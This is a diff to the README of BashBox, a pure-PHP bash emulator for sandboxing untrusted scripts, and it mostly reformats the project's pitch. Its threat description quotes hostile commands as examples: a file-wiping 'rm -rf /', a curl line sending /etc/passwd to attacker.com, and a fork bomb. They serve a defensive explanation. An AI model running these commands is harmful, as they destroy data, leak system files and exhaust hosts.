shipfastlabs/bashbox/README.md

 cat /var/log/app.log | grep "ERROR" | awk '{print $1, $2, $5}' | sort | uniq -c | sort -rn
 ```

 **The problem:** Running user-generated bash code on your servers is dangerous.
-One malicious script could:
-- Delete critical files (`rm -rf /`)
-- Exfiltrate sensitive data (`curl -d @/etc/passwd attacker.com`)
-- Launch denial-of-service attacks (`:(){ :|:& };:`)
-- Access internal network resources (SSRF attacks)
+One malicious script could delete critical files (`rm -rf /`), exfiltrate sensitive data (`curl -d @/etc/passwd attacker.com`), launch denial-of-service attacks (`:(){ :|:& };:`), or access internal network resources (SSRF attacks).

 **Traditional solutions** use containers or VMs, but those are slow, resource-heavy, and complex to orchestrate.

-**BashBox** takes a different approach: it implements a complete bash interpreter in pure PHP with zero system calls.
+**BashBox** takes a different approach.
+It implements a complete bash interpreter in pure PHP with zero system calls.
 Think of it as a "bash emulator" that gives you:

-- ⚡ **Instant execution** — no container startup time
+- **Instant execution** with no container startup time
-- 🛡️ **True isolation** — no access to your real filesystem or network (unless you explicitly allow it)
+- **True isolation** with no access to your real filesystem or network unless you explicitly allow it
-- 🎛️ **Fine-grained control** — limit commands, loops, memory, and execution time
+- **Fine-grained control** to limit commands, loops, memory, and execution time
-- 🔧 **Full bash compatibility** — pipes, redirects, functions, control flow, substitutions, and more
+- **Full bash compatibility** including pipes, redirects, functions, control flow, and substitutions

 Perfect for AI agents, code execution platforms, CI/CD systems, or anywhere you need to run untrusted bash scripts safely.